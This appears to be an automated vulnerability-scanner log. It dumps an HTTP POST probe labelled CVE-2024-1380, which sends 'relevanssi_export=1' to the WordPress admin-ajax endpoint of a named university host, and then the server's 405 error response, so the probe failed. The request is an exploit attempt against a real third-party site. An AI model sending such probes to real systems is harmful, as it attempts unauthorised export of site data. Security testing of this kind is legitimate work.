[CVE-2024-1380] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin-ajax.php


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 27
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

action=&relevanssi_export=1
[CVE-2024-1380] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin-ajax.php

HTTP/1.1 405 Method Not Allowed
Connection: close
Content-Length: 422
Allow: GET, HEAD, OPTIONS
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:19:02 GMT
Server: AmazonS3
Via: 1.1 5043b84f34fb5bb6eac6e083162dc722.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 7iKxGrJK_0Iri20LNU84qnzEqb-HTgfHj33IhFBfgE8jS7xU2__xlA==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>405 Method Not Allowed</title></head>
<body>
<h1>405 Method Not Allowed</h1>
<ul>
<li>Code: MethodNotAllowed</li>
<li>Message: The specified method is not allowed against this resource.</li>
<li>Method: POST</li>
<li>ResourceType: OBJECT</li>
<li>RequestId: YT0Y2H848RPPSVWG</li>
<li>HostId: 4oKjpi3ZMHRyb9fm8eX9sx3s8a7aNxnlM219UgNH3ldGPfgI7howf9iAYAbRyKrdDiju8+jXcKM=</li>
</ul>
<hr/>
</body>
</html>

